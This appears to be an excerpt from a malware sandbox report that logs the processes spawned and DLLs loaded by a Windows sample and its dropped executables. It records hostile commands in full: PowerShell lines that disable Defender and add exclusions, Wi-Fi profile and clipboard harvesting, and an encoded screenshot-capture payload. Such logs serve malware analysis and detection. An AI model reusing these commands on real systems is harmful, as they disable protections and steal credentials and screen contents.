Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Section loaded: ntmarta.dll	Jump to behavior
